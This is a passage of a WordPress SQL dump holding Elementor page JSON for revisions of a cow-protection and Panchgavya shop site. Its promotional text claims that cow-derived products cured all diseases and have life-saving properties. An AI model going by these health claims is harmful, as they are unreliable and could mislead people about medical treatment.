Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11279,1878,'_elementor_page_assets','a:0:{}'),(11280,1879,'_elementor_edit_mode','builder'),(11281,1879,'_elementor_template_type','wp-page'),(11282,1879,'_elementor_version','3.7.8'),(11283,1879,'_wp_page_template','elementor_canvas'),(11284,1879,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11285,1879,'_elementor_page_assets','a:0:{}'),(11287,1880,'_elementor_edit_mode','builder'),(11288,1880,'_elementor_template_type','wp-page'),(11289,1880,'_elementor_version','3.7.8'),(11290,1880,'_wp_page_template','elementor_canvas'),(11291,1880,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11292,1880,'_elementor_page_assets','a:0:{}'),(11294,1881,'_elementor_edit_mode','builder'),(11295,1881,'_elementor_template_type','wp-page'),(11296,1881,'_elementor_version','3.7.8'),(11297,1881,'_wp_page_template','elementor_canvas'),(11298,1881,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11299,1881,'_elementor_page_assets','a:0:{}'),(11301,1882,'_elementor_edit_mode','builder'),(11302,1882,'_elementor_template_type','wp-page'),(11303,1882,'_elementor_version','3.7.8'),(11304,1882,'_wp_page_template','elementor_canvas'),(11305,1882,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"set